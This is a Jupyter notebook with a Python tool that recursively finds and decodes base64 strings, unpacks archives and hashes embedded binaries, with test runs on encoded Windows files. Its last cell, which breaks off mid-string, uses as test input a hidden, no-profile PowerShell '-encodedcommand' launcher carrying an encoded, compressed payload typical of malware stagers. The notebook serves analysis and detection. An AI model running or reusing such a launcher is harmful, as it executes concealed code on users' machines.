# Base64 Binary Decoder/Unpacker/Hash extractor

Version 1.0<br>
Author: Ian Hellen

# Code

In [5]:
# Base64 string and binary Extraction
import base64
import hashlib
import io
import tarfile
import zipfile
import gzip
import re
import pandas as pd
import binascii
from collections import namedtuple

Binary_record = namedtuple('Binary_record', ['file_type', 'file_hashes', 'input_bytes', 'decoded_string', 'encoding_type'])


def compile_regex(regex: str) -> object:
    """Compile a string regex
    :param regex: 
    :return Compiled regex: 
    """
    return re.compile(regex, re.I | re.X)

debug_print = False

# Base64 regex
base64_regex = '(?P<b64>[A-Za-z0-9+/\\n\\r]{30,}={0,2})'
base64_regex_c = compile_regex(base64_regex)
# '''(?<![A-Za-z0-9+\/])
#             (?:
#                 (?:[A-Za-z0-9+\/]{4})*
#                 (?:
#                     [A-Za-z0-9+\/]{2} [AEIMQUYcgkosw048] = |
#                     [A-Za-z0-9+\/] [AQgw] ==
#                 ) |
#                 (?:[A-Za-z0-9\/]{4})*
#                 (?:
#                     \+ [A-Za-z0-9\/+]{3} |
#                     [A-Za-z0-9\/] \+ [A-Za-z0-9+\/]{2} |
#                     [A-Za-z0-9\/]{2} \+ [A-Za-z0-9+\/] |
#                     [A-Za-z0-9\/]{3} \+
#                 )
#                 (?:[A-Za-z0-9+\/]{4})*
#             )
#             (?![A-Za-z0-9+\/=])'''


def decode_base64_string(input_string, max_recursion=20, trace=False):
    """
    Attempts to base64 decode an input string.
    Items that decode to utf-8 or utf-16 strings will be returned as decoded strings replaced in the original string.
    If the encoded string is a known binary type it will identify the file type and return the hashes of the file.
    If any binary types are known archives (zip, tar, gzip) it will unpack the contents of the archive
    For any binary it will return the decoded file as a byte array, and as a printable list of byte values.
    The function returns:
     - decoded string : this is the input string with any decoded sections replaced by the results of the decoding
     It also returns the data as a Pandas DataFrame with the following columns:
     - reference : this is an index that matches an index number in the returned string 
                    (e.g. <<encoded binary type=pdf index=1.2'). The first number indicates the depth of recursion
                    (1-based) and the second is the 0-based index of decoded strings in that iteration. Anyway,
                    the meaning isn't important, it just allows you to easily map the output string values to the 
                    relevant DataFrame rows (note that in the case of multi-file archives, all files in that archive
                    will have the same reference number
     - original_string : the string prior to decoding
     - file_type : the type of file if this could be determined
     - file_hashes : a dictionary of hashes (the md5, sha1 and sha256 hashes are broken out into separate columns)
     - input_bytes : the binary image as a byte array
     - decoded_string : printable form of the decoded string (either string or list of hex byte values)
     - encoding_type : utf-8, utf-16 or binary
     - md5, sha1, sha256 : the respective hashes of the binary
     file_type, file_hashes, input_bytes, md5, sha1, sha256 will be null if this item is decoded to a string
    """
    global debug_print
    debug_print = trace
    
    if not input_string or len(input_string) == 0:
        return None
    else:
        return decode_b64_string_recursive(input_string=input_string, max_recursion=max_recursion)
        

def debug_print_trace(*args):
    if debug_print:
        for arg in args:
            print(arg, end='')
        print()

   
# base64 decoding
def decode_and_format_b64_string(b64encoded_string, current_index=0, current_depth=1):
    """Decode string and return displayable content plus list of decoded artifacts"""
    
    # Check if we recognize this as a known file type
    (prefix, f_type) = is_known_b64_prefix(b64encoded_string)
    debug_print_trace('Found type: ', f_type)
    output_files = decode_b64_binary(b64encoded_string, f_type)
    if not output_files:
        return b64encoded_string, None
    
    if len(output_files) == 1:
        binary_record = list(output_files.values())[0]
        debug_print_trace('decode_b64_binary returned a single record')
        debug_print_trace('record:', binary_record)
        if binary_record.encoding_type in ['utf-8', 'utf-16']:
            display_string = f'<decoded type=\'string\' index=\'{current_depth}.{current_index}\'>{binary_record.decoded_string}</decoded>'
            return display_string, [binary_record]
        else:
            display_string = f'<decoded value=\'binary\' type=\'{binary_record.file_type}\' index=\'{current_depth}.{current_index}\'/>'
            return display_string, [binary_record]
    else:
        display_header = f'<decoded value=\'multiple binary\' type=\'{binary_record.file_type}\' index=\'{current_depth}.{current_index}\''
        child_display_strings = []
        child_index = 0
        debug_print_trace('decode_b64_binary returned multiple records')
        for child_rec in output_files:
            debug_print_trace('Child_decode: ', child_rec)
            child_index_string = f'{current_depth}.{current_index}.{child_index}'
            if child_rec.encoding_type == 'utf-8':
                child_display_string = f'<decoded type=\'string\' index=\'{child_index_string}\'>{child_rec.decoded_string}</decoded>'
            else:
                child_display_string = f'<decoded type=\'{child_rec.file_type}\' index=\'{child_index_string}\'/>'
            child_display_strings.add(child_display_string)
            child_index += 1
            
        display_string = display_header + ''.join(child_display_strings) + '</decoded>'
        return display_string, output_files.values()


def decode_b64_string_recursive(input_string, undecodable_strings=None, max_recursion=20, current_depth=1):
    """Tries to recursive decode and unpack a binary string
    :rtype: (str, [Binary_record]
    """
    debug_print_trace('decode_b64_string_recursive: ', max_recursion)
    debug_print_trace('processing input: ', input_string[:200])
    
    # we want to get rid of line feeds temporarily
    decoded_string = input_string #.replace('\r\n','').replace('\n', '')
    if not undecodable_strings:
        undecodable_strings = set()
    
    binary_records = pd.DataFrame(columns=['reference', 'original_string','file_type', 'input_bytes',
                                           'decoded_string', 'encoding_type', 'md5', 'sha1', 'sha256'])
    fragment_index = 0
    match_pos = 0
    something_decoded = False
    while True:
        # search sequentially through the input string for any strings that look like base64
        debug_print_trace('regex searching ', decoded_string[:200], ' from pos: ', match_pos, ' bin_index ', fragment_index)
        b64match = base64_regex_c.search(decoded_string, match_pos)
                
        # debug_print_trace('groups: ', len(b64match.groupdict()))
        if b64match != None:
            debug_print_trace('regex found: ', b64match.groupdict()['b64'])
            # if (in a recursive call) we already know that this string doesn't decode
            # skip this match
            if b64match.groupdict()['b64'] in undecodable_strings:
                debug_print_trace('previous undecodable string')
                match_pos = b64match.end()
                continue
            
            # try to decode
            (decoded_fragment, binary_items) = decode_and_format_b64_string(b64match.groupdict()['b64'], 
                                                               current_index=fragment_index, current_depth=current_depth)
            # if the string didn't decode we'll have the same output as input
            # so add that to our set of undecodable strings (we need to track this
            # otherwise we will recurse infinitely)
            something_decoded = (decoded_fragment != b64match.groupdict()['b64'])
            if something_decoded:
                # we did decode something so lets put our result this in the output string
                if binary_items:
                    # if there are one or more binary_items from decoding
                    # add them to our output DataFrame
                    for bin_record in binary_items:
                        new_row = bin_record._asdict()
                        new_row['reference'] = f'{current_depth}.{fragment_index}'
                        new_row['original_string'] = b64match.groupdict()['b64']
                        new_row['md5'] = new_row['file_hashes']['md5']
                        new_row['sha1'] = new_row['file_hashes']['sha1']
                        new_row['sha256'] = new_row['file_hashes']['sha256']
                        binary_records = binary_records.append(new_row, ignore_index=True, sort=False)
                
                # if the decoded string replacement also contains base64-like string
                # we don't skip past the current match position, so only do this if
                # we can't find any new base64 strings in the decoded fragment
                #if base64_regex_c.search(decoded_fragment, 0) == None:
                
                
                # replace the decoded fragment in our current results string (decode_string)
                decoded_string = decoded_string.replace(b64match.groupdict()['b64'], decoded_fragment)
                debug_print_trace('Replaced string', decoded_string[match_pos:match_pos+100])
                match_pos += len(decoded_fragment)
            else:
                undecodable_strings.add(b64match.groupdict()['b64'])
                debug_print_trace('new undecodable string')
                match_pos = b64match.end()
            
        else:
            debug_print_trace('Regex not found: ', match_pos)
            break
        fragment_index += 1 
        
        if fragment_index > 50:
            break
        
    # if we reach our max recursion depth bail out here
    if max_recursion == 0:
        debug_print_trace('max recursion reached')
        return decoded_string, binary_records
    
    if something_decoded:
        # stuff that we have already decoded may also contain further base64 encoded strings
        (next_level_string, child_records) = decode_b64_string_recursive(decoded_string, undecodable_strings, 
                                                                         max_recursion=max_recursion - 1, 
                                                                         current_depth=(current_depth + 1))
        return next_level_string, binary_records.append(child_records, ignore_index=True)
    else:
        debug_print_trace('Nothing left to decode')
        return decoded_string, binary_records


def print_bytes(bytes_array):
    """Print byte array as string or hex"""
    (enc_type, dec_string) = get_byte_encoding(bytes_array)
    if enc_type != 'binary':
        print(dec_string)
        
    else:
        print('Could not decode bytes to string. Hashes:')
        print(get_hashes(binary_to_bytesio(bytes_array).getbuffer()))
        print(dec_string)

     
def get_byte_encoding(bytes_array):
    """Returns encoding type and decoded result
    Decoded result is list of hex bytes in the case that the decoded
    result is not a string"""
    try:
        decoded_result = bytes_array.decode('utf-8')
        enc_type = 'utf-8'
        
        if '\x00' in decoded_result:
            # looks like unicode encoding
            decoded_result = bytes_array.decode('utf-16')
            enc_type = 'utf-16'
    except UnicodeDecodeError:
        enc_type = 'binary'
        decoded_result = ['{0:02x}'.format(b) for b in bytes_array]
    return enc_type, decoded_result
            

base64_header_types = {
    'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug': 'exe',
    'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug': 'dll',
    'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug': 'sys',
    'UEsDBBQAAAAIA': 'zip',
    'UEsDBBQAAQAIA': 'zip (passprotected)',
    'H4sI': 'gz',
    'N3q8ryccAAR': '7z',
    'UmFyIRoHAM': 'rar',
    'JVBERi0xLjcNC': 'pdf',
    '0M8R4KGxGuE': 'msi',
    'TVNXSU0AAADQ': 'wim'}

base64_header_offset_types = {
    'DAxMDA3NzcAMDAwMDAwM': 'tar'
}


def is_known_b64_prefix(input_string):
    """If this is known file type return the """
    first160chars = input_string[0:160].replace('\n', '').replace('\r', '')
    for prefix, file_type in base64_header_types.items():
        if first160chars.startswith(prefix):
            return prefix, file_type

    for matching_string, file_type in base64_header_offset_types.items():
        # TODO compile this regex beforehand
        regex_comp = compile_regex(matching_string)
        if regex_comp.search(first160chars):
            return matching_string, file_type
    return None, None


def decode_b64_binary(input_string, file_type=None):
    """Examine input string for known binaries and decode and unpack"""
    input_string
    match_pos = 0
    binaries_found = dict()
    if not file_type:
        (prefix, f_type) = is_known_b64_prefix(input_string)
        file_type = f_type
    
    try:
        decoded_bytes = base64.b64decode(input_string)
        return unpack_and_hash_b64_binary(decoded_bytes, file_type)
    except binascii.Error:
        # we couldn't decode
        debug_print_trace('Binascii exception - trying to decode string')
        debug_print_trace(input_string)
        return None
    

def unpack_and_hash_b64_binary(input_bytes, file_type=None):
    """
    If this is a known archive type extract the contents
    Return a dictionary of (file_type : (file_name, file_hashes, input_bytes, decoded_string, encoding_type)
    """
    if not input_bytes or len(input_bytes) == 0:
        return None

    output_files = dict()
    if file_type in ['zip', 'gz', 'tar']:
        # if this is a known archive type - try to extract the contents
        (unpacked_type, file_items) = get_items_from_archive(input_bytes, file_type)
        if unpacked_type != 'unknown':
            for file_name, extracted_file in file_items.items():
                (file_hashes, decoded_string, encoding_type) = get_hashes_and_printable_string(extracted_file)
                idx = f'[{unpacked_type}] Filename: {file_name}'
                output_files[idx] = Binary_record(file_name, file_hashes, extracted_file, decoded_string, encoding_type)
                debug_print_trace('unpack_and_hash_b64_binary item (archive): ', type(decoded_string), decoded_string)
                
    if len(output_files) == 0:
        # if this wasn't a known archive type or we failed to unpack anything, just get the hashes and return
        (file_hashes, decoded_string, encoding_type) = get_hashes_and_printable_string(input_bytes)
        idx = f'[{file_type}]'
        output_files[idx] = Binary_record(file_type, file_hashes, input_bytes, decoded_string, encoding_type)
        debug_print_trace('unpack_and_hash_b64_binary item (other): ', type(decoded_string), decoded_string)
    return output_files


def get_hashes_and_printable_string(extracted_file):
    """ Get the hashes, encoding type and printable form of binary (either string or list of hex-encoded byte values)"""
    file_hashes = get_hashes(extracted_file)
    (encoding_type, decoded_string) = get_byte_encoding(extracted_file)
    return file_hashes, decoded_string, encoding_type


def get_items_from_archive(binary, archive_type='zip'):
    """Extract contained files from an archive type"""
    debug_print_trace('get_items_from_archive type: ', archive_type)
    if archive_type == 'zip':
        return get_items_from_zip(binary)
    elif archive_type == 'gz':
        return get_items_from_gzip(binary)
    elif archive_type == 'tar':
        return get_items_from_tar(binary)
    else:
        return 'unknown', {archive_type, binary}


def get_items_from_gzip(binary):
    """Return decompressed gzip contents"""
    archive_file = gzip.decompress(binary)
    return 'gz', {'gzip_file': archive_file}


def get_items_from_zip(binary):
    """Return dictionary of zip contents"""
    file_obj = io.BytesIO(binary)
    zip_archive = zipfile.ZipFile(file_obj, mode='r')
    archive_dict = dict()
    for item in zip_archive.namelist():
        archive_file = zip_archive.read(item)
        archive_dict[item] = archive_file
    return 'zip', archive_dict


def get_items_from_tar(binary):
    """Return dictionary of tar file contents"""
    file_obj = io.BytesIO(binary)
    # Open tarfile
    tar = tarfile.open(mode="r", fileobj=file_obj)
    archive_dict = dict()
    # Iterate over every member
    for item in tar.getnames():
        tar_file = tar.extractfile(item)
        archive_file = tar_file.read()
        archive_dict[item] = archive_file
    return 'tar', archive_dict


def get_hashes(binary):
    hash_dict = dict()
    for hash_type in ['md5', 'sha1', 'sha256']:
        if hash_type == 'md5':
            hash_alg = hashlib.md5()
        elif hash_type == 'sha256':
            hash_alg = hashlib.sha256()
        elif hash_type == 'sha1':
            hash_alg = hashlib.sha1()
        hash_alg.update(binary)
        hash_dict[hash_type] = hash_alg.hexdigest()
    return hash_dict


def binary_to_bytesio(binary):
    if isinstance(binary, io.BytesIO):
        return binary.getbuffer()
    return io.BytesIO(binary).getbuffer()



In [6]:
def unpack_base64_items(input_string=None, input_frame=None, column=None, trace=False):
    """
    Attempts to base64 decode an input string or multiple strings taken from a pandas dataframe column.
    If the input is a dataframe you must supply the name of the column to use.
    
    Items that decode to utf-8 or utf-16 strings will be returned as decoded strings replaced in the original string.
    If the encoded string is a known binary type it will identify the file type and return the hashes of the file.
    If any binary types are known archives (zip, tar, gzip) it will unpack the contents of the archive
    For any binary it will return the decoded file as a byte array, and as a printable list of byte values.
    If the input is a string the function returns:
     - decoded string : this is the input string with any decoded sections replaced by the results of the decoding
    It also returns the data as a Pandas DataFrame with the following columns:
     - reference : this is an index that matches an index number in the returned string 
                    (e.g. <<encoded binary type=pdf index=1.2'). The first number indicates the depth of recursion
                    (1-based) and the second is the 0-based index of decoded strings in that iteration. Anyway,
                    the meaning isn't important, it just allows you to easily map the output string values to the 
                    relevant DataFrame rows (note that in the case of multi-file archives, all files in that archive
                    will have the same reference number
     - original_string : the string prior to decoding
     - file_type : the type of file if this could be determined
     - file_hashes : a dictionary of hashes (the md5, sha1 and sha256 hashes are broken out into separate columns)
     - input_bytes : the binary image as a byte array
     - decoded_string : printable form of the decoded string (either string or list of hex byte values)
     - encoding_type : utf-8, utf-16 or binary
     - md5, sha1, sha256 : the respective hashes of the binary
     file_type, file_hashes, input_bytes, md5, sha1, sha256 will be null if this item is decoded to a string
     
    If the input is a dataframe the output dataframe will also include the following column:
     - input_frame_index - the index of the source row in the input frame. This allows you to re-join the output
       data to the input data
    """
    if input_string:
        return decode_b64_string_recursive(input_string, trace)
    if input_frame is not None:
        if not column:
            print('column must be supplied if the input is a DataFrame')
            return None
        else:
            output_df = None
            for input_row in input_frame[[column]].itertuples():
                (decoded_string, output_frame) = decode_b64_string_recursive(input_row[1], trace)
                output_frame['input_frame_index'] = input_row.Index
                output_frame['full_decoded_string'] = decoded_string
                if output_df is None:
                    output_df = output_frame
                else:
                    output_df = output_df.append(output_frame, ignore_index=True, sort=False)
            return output_df
                    

## Tests

### Files

In [209]:
import os
from os import listdir
from os.path import join
testdir = 'testB64Files'
listdir(testdir)
for f in os.listdir(testdir)[3:8]:
    fname = join(testdir, f)
    inputf = open(fname, 'r')
    fstring = inputf.read()
    print('-'*30)
    print('File:', fname)
    # print('input string', fstring[:200].replace('\n', ''), 'end')
    
    (x, output_files) = unpack_base64_items(fstring)
    print('Output string', x)
    print('Output dataframe')
    display(output_files)

------------------------------
File: testB64Files\acpidev.wim.txt
Output string -----BEGIN CERTIFICATE-----<decoded value='binary' type='wim' index='1.0'/>
-----END CERTIFICATE-----

Output dataframe


Unnamed: 0,decoded_string,encoding_type,file_hashes,file_type,input_bytes,md5,original_string,reference,sha1,sha256
0,"[4d, 53, 57, 49, 4d, 00, 00, 00, d0, 00, 00, 0...",binary,"{'md5': '893d05f4d9ff9af3a741e981ab9507cf', 's...",wim,b'MSWIM\x00\x00\x00\xd0\x00\x00\x00\x00\r\x01\...,893d05f4d9ff9af3a741e981ab9507cf,\nTVNXSU0AAADQAAAAAA0BAIAAAAAAAAAAgGsFIIeN9tgo...,1.0,cabea72d392a0d524f13c75ad73b27bfc7100868,55bf491db9d4b7a337c6de4cd915c1f5cccbc9616c9b11...


------------------------------
File: testB64Files\Autologon.7z.txt
Output string -----BEGIN CERTIFICATE-----<decoded value='binary' type='7z' index='1.0'/>-----END CERTIFICATE-----

Output dataframe


Unnamed: 0,decoded_string,encoding_type,file_hashes,file_type,input_bytes,md5,original_string,reference,sha1,sha256
0,"[37, 7a, bc, af, 27, 1c, 00, 04, 69, aa, 41, 4...",binary,"{'md5': '994e172b70b2f7e737976b80431fcfcc', 's...",7z,b'7z\xbc\xaf\'\x1c\x00\x04i\xaaAEu\xe3\x00\x00...,994e172b70b2f7e737976b80431fcfcc,\nN3q8ryccAARpqkFFdeMAAAAAAABiAAAAAAAAAJ+GZXXi...,1.0,e889954d9e42699faf8161775be1c12d8bb5d5c2,3f832f43743b5b3ad8a2dace6fae05b12d5b9d4877ff6a...


------------------------------
File: testB64Files\Autologon.exe.txt
Output string -----BEGIN CERTIFICATE-----<decoded value='binary' type='exe' index='1.0'/>
-----END CERTIFICATE-----

Output dataframe


Unnamed: 0,decoded_string,encoding_type,file_hashes,file_type,input_bytes,md5,original_string,reference,sha1,sha256
0,"[4d, 5a, 90, 00, 03, 00, 00, 00, 04, 00, 00, 0...",binary,"{'md5': '607a332709458f781c20ab49940c4b64', 's...",exe,b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\x...,607a332709458f781c20ab49940c4b64,\nTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...,1.0,923409be6c1b183c74da221dd23a42b4b981ba19,324c64d24818a0be63a43a8df678b88dca4f8959841f91...


------------------------------
File: testB64Files\Autologon.gz.txt
Output string -----BEGIN CERTIFICATE-----<decoded value='binary' type='gzip_file' index='1.0'/>
-----END CERTIFICATE-----

Output dataframe


Unnamed: 0,decoded_string,encoding_type,file_hashes,file_type,input_bytes,md5,original_string,reference,sha1,sha256
0,"[4d, 5a, 90, 00, 03, 00, 00, 00, 04, 00, 00, 0...",binary,"{'md5': '607a332709458f781c20ab49940c4b64', 's...",gzip_file,b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\x...,607a332709458f781c20ab49940c4b64,\nH4sICLlgIFoEAEF1dG9sb2dvbi5leGUA7Fx/fBTFFd+7...,1.0,923409be6c1b183c74da221dd23a42b4b981ba19,324c64d24818a0be63a43a8df678b88dca4f8959841f91...


------------------------------
File: testB64Files\Autologon.tar.txt
Output string -----BEGIN CERTIFICATE-----<decoded value='binary' type='Autologon.exe' index='1.0'/>
-----END CERTIFICATE-----

Output dataframe


Unnamed: 0,decoded_string,encoding_type,file_hashes,file_type,input_bytes,md5,original_string,reference,sha1,sha256
0,"[4d, 5a, 90, 00, 03, 00, 00, 00, 04, 00, 00, 0...",binary,"{'md5': '607a332709458f781c20ab49940c4b64', 's...",Autologon.exe,b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\x...,607a332709458f781c20ab49940c4b64,\nQXV0b2xvZ29uLmV4ZQAAAAAAAAAAAAAAAAAAAAAAAAAA...,1.0,923409be6c1b183c74da221dd23a42b4b981ba19,324c64d24818a0be63a43a8df678b88dca4f8959841f91...


### Input dataframe

In [210]:
import pandas as pd
testdir = 'testB64Files'
listdir(testdir)
df = pd.DataFrame(columns=['filename', 'data'])
for f in os.listdir(testdir)[:5]:
    fname = join(testdir, f)
    inputf = open(fname, 'r')
    fstring = inputf.read()
    df = df.append({'filename':fname, 'data': fstring}, ignore_index=True)
    
display(df)       
output_files = unpack_base64_items(input_frame=df, column='data')
display(output_files)

Unnamed: 0,filename,data
0,testB64Files\acledit.dll.txt,-----BEGIN CERTIFICATE-----\nTVqQAAMAAAAEAAAA/...
1,testB64Files\acpidev.sys.txt,-----BEGIN CERTIFICATE-----\nTVqQAAMAAAAEAAAA/...
2,testB64Files\acpidev.tar.txt,-----BEGIN CERTIFICATE-----\nQWNwaURldi5zeXMAA...
3,testB64Files\acpidev.wim.txt,-----BEGIN CERTIFICATE-----\nTVNXSU0AAADQAAAAA...
4,testB64Files\Autologon.7z.txt,-----BEGIN CERTIFICATE-----\nN3q8ryccAARpqkFFd...


Unnamed: 0,decoded_string,encoding_type,file_hashes,file_type,input_bytes,md5,original_string,reference,sha1,sha256,input_frame_index,full_decoded_string
0,"[4d, 5a, 90, 00, 03, 00, 00, 00, 04, 00, 00, 0...",binary,"{'md5': 'a31058afbb422ca59958e7e06553df99', 's...",dll,b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\x...,a31058afbb422ca59958e7e06553df99,\nTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...,1.0,53ed1ce3bfdde36dbf92acf7bcb8a49f6aa2bfbe,26bc81e7b6fddf98ac06204198fd7a43215543cda90d3f...,0,-----BEGIN CERTIFICATE-----<decoded value='bin...
1,"[4d, 5a, 90, 00, 03, 00, 00, 00, 04, 00, 00, 0...",binary,"{'md5': '75795e4b19bb3ed8d3c25a17cd15dc30', 's...",sys,b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\x...,75795e4b19bb3ed8d3c25a17cd15dc30,\nTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...,1.0,4da03fe2daf70ad0727621d5aede479f4ae45acc,22a13064e0b472a0a2258d61a889b73ee3f537da7796cc...,1,-----BEGIN CERTIFICATE-----<decoded value='bin...
2,"[4d, 5a, 90, 00, 03, 00, 00, 00, 04, 00, 00, 0...",binary,"{'md5': '75795e4b19bb3ed8d3c25a17cd15dc30', 's...",AcpiDev.sys,b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\x...,75795e4b19bb3ed8d3c25a17cd15dc30,\nQWNwaURldi5zeXMAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...,1.0,4da03fe2daf70ad0727621d5aede479f4ae45acc,22a13064e0b472a0a2258d61a889b73ee3f537da7796cc...,2,-----BEGIN CERTIFICATE-----<decoded value='bin...
3,"[4d, 53, 57, 49, 4d, 00, 00, 00, d0, 00, 00, 0...",binary,"{'md5': '893d05f4d9ff9af3a741e981ab9507cf', 's...",wim,b'MSWIM\x00\x00\x00\xd0\x00\x00\x00\x00\r\x01\...,893d05f4d9ff9af3a741e981ab9507cf,\nTVNXSU0AAADQAAAAAA0BAIAAAAAAAAAAgGsFIIeN9tgo...,1.0,cabea72d392a0d524f13c75ad73b27bfc7100868,55bf491db9d4b7a337c6de4cd915c1f5cccbc9616c9b11...,3,-----BEGIN CERTIFICATE-----<decoded value='bin...
4,"[37, 7a, bc, af, 27, 1c, 00, 04, 69, aa, 41, 4...",binary,"{'md5': '994e172b70b2f7e737976b80431fcfcc', 's...",7z,b'7z\xbc\xaf\'\x1c\x00\x04i\xaaAEu\xe3\x00\x00...,994e172b70b2f7e737976b80431fcfcc,\nN3q8ryccAARpqkFFdeMAAAAAAABiAAAAAAAAAJ+GZXXi...,1.0,e889954d9e42699faf8161775be1c12d8bb5d5c2,3f832f43743b5b3ad8a2dace6fae05b12d5b9d4877ff6a...,4,-----BEGIN CERTIFICATE-----<decoded value='bin...


### Nested powershell encoding

In [7]:
input_str = '''powershell.exe  -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMADEAWABlAFcALwBiAHUAQgBMAC8ATwAvADQAVQB3AGkASwBBAEoATgBUAHgAbgBXAHgAUwBJAEUAQQBwADMANgA2AHYAKwBKAEEAYwBlADQAMgBBAEYAbQBtAFoATQBTAFcANgBFAGgAWABIADIAZgBhADcANwArAGgAdwA2ADcANgBrACsANwBMAFkAaAB5AGQAQQBBAEUAWABPAEQARwBkACsAYwAyAHAATQA1AGMAVgBZACsAcwB5AFcAUABVAEcAbwBjAG0ARgBTAFAAMgBEAEMAVQAwAHEAWgB6AEgAbABOAHQASwBWAHkAcQAzAHgAUwBNACsAdgBRAHMAMgBXADAASABTADAAZQBIAEMAbwBmAGQAcgA2AHcASAB6AEEAaABQAGcAMABDADUAYwAvAE0AMgBSAEQANwAyAEYAVwAwADgAeQBmAHMAUAA3AGkAQwBoAEoAeABtAGwAZgBnAGoASQBxAFEAawA5AEsAbAArAGQAcABZADUAaQA3AGQAQwBMADgAQgByACsAdQBCAGgAeQBaADcAbwBnADAAdgBsAFIAcABBAEEATAB0AEkAVwBhAEwAZQByAEMAUgBjAHoAYgAvAG4AeABZAHoAWAAwAGYAZQByAEoANQBEAHYAWABwAEIASQBGAEEAWABWAFgAbgBOAEYAQQAwADUAVwB2AGkAcgBXAGgAUAByADAAWQByAEIANgBwAEwAWgBVAC8AbABmAE8ASABYAEoATwBMAEYAZQBZAHAAMgBhAEcASwA3AFEAMABZAGgARAB3AFMAbgBYAFcARgBqAFMATQBMAGMAdQBNAGQAWgAxAEoAVAAvAC8AaABEADEAUgBjAFgAeABXAFcAdQAvAGkAWABFAFAATgBEAFUAOABTAEcAUQAxAE0AMABSAHoAbABWAGQAKwBhAFoASABGADAANABPAE8ANgBxAHAAUABXAGIANwBJAGgAQgByAG0AYgBPAFkAVgB5ADcAbABwAHIASAAyAC8AVgBqADUAWABxAEsANwBxAG0AZgBBAE4AcAAvAEsAMABQAGUAVQBYADUAcwBZAHkAVQB3ADQATgBCAFcAVwBRADAAQQBHAEoAUQBpAHEAZQBxADcAdABQAFkAawB0ADEAYwA2ADkAawBQAE8AcwA4AGsAbABiAHAAQQBxAE4AUQBrADgAeQBsADgASwA1AHAATAA3AFkAagBhAG4ALwB4AEcAdwBhADUARgByAFkASQA1AHkATwA2AEgAcQBwADkAZQBuACsAaQBNAE4ANwBtAGIAUgBUAEoAcQBBAGEAUwBsAC8AUABwAHUANQA3AGoAKwA2ADkAMgBNAFcASgBPAEYAVgAvAHIAZgAxAEoASABPAGoAdwB2AEkAbwBGAFAAZgBNAHQAOAAwAFoAVQBFAGMAcQBwAGcAeQBWADkAawBBAEQAOQBTAFYAaABsAHoAcwA0AFcAOABaAEsAQwBQAGQAcABRAEIAQwB6AG0AdQAxAFUASwBXAGEAVQBIAFMAbQBBAHAALwBBAE4AOABuAGsALwA4AGsATwBwAEwAWgBSAEcANQBiAHIARgBjAHAAdABjAGUATwBZAFAAcwBMAHcAVQBWAGoAMQB3AHAAVAArAEwATQBSAEkAOQBiAFoAVwBFAEsAUgBwAGEAWgBzADkAagBQADgAWABsADAAOABMAEEASwBHAFMAZgBVAGoAdwBoACsASABiAGsAMQB1AG0AWQBlAHIAUgAwADgANwBEAEwANwBHAEoAegBhAFcAMAA2AGoAYQAwADUAagBRAEgASgBIAHMAagA0AG8AcQBxAG4AcABBAFMAVwAxAEYAQgA0ADEAUQBuAFQAeABtAHEAMwB1AE0AdgBtAGQAMQAwAGkAVQBRAHoAWQA0AFAAZwBDAHQASQBDAGIAMABuADUAVgBKAG4ASwBpAHAAYgBhADkASABYAFEAQQB3ACsAVgBiAEIAVwBXAHQASQBDAFgAcQBrAFQAdABQAGcAYwBMAHcAOQArAGcAWQBpAHQAYwBwAHgARQBHAFMAVgBZAFEAZwA1AGEAVwBlAFYATQBjAFcAYwBrAHEAeQBDAHYASQBDAGwAUgB5AGkAVQBJAGwANgBxAFAAOQBUAHQAaABWAHcAeQBHAHcAZgB5AEsARwA2AHAAdgB3AEYAcABlAG4AVgBWAGUASQBIADAAUQB4AHYAYwBDAHoAQgBNAHgAagB0AHEATQA4AHcAagBWAEwASgBLAGkAeABGAHEASABNAGIATQBPAGEAcQBnAHYAbwBsAEoARgBYAFAATwBQAEEAYwBrAFAAWQBGAFAAWQBDAGYAQwBZAGkAeQBqAG8AUABGAEoAOQBqADgARABSAE0AKwBOAHEAVwB5ADcATwAwADUAZABvAEkANAByAFIAbwBOAGoAQgArAHAARABtAGwASgB4AHYARwBHAEgARQB2AFYAdgAxAEQANABtAFMAcABJAFYARQBWAFoASABrAEUANgBVAGgAZwBBAFkAYwB5AEcAegBpAHMAbAA4AEMAVABWAEkAegBiADYASwB2AEgAKwBwADMAcwA4AGwANgBTAGMAOQBxAHoANQBOAFAAYQBuAEYAcQBiAGcAdwBEAGoASgBLAG0ASgBqAFMAagBqAHIAQgA3AFgAYwB3AFkAKwBoADgAQwBiAEEAMQBmAE8ARQBhAE8ASwBCAFgAbABhAGgAbABlAEkANwAyAFcAMwA3AEEATwBnAGkAZQArADcAYgBIAGUANgBTAHoAWgBjAFgAMgBIAHQANABlAHYARgBOAFcAYgBvAHYAYQA3ACsAUgB6ADUANwBHAFYANwA5AG4AVgBZAE4AaABzAFgAQwBPADIAZAAvAGIAMgBkAFIALwBaAGEAMwBiAGQANgBNAHkAQQA3AG8ANABWADIAdABlAEkAVgBMAHQAMwBMAGQAYgBZAHQAMABhAGYARQBUAEYAZwB6ADcAbABuAFIAYwBkAEIAWgBQAGcANAByAEwAdgBkAGYAagBzAHcAaQBxAG0AYwBoAE4AKwB1AFYARgBxAHoAQQBpAHEAWABLADQATgB5AFkAVQB0AG8ASgA2AEwAZgBJAHQASgAzADIAZgA2ADUAQwAyAHUAbwByAFkATwB1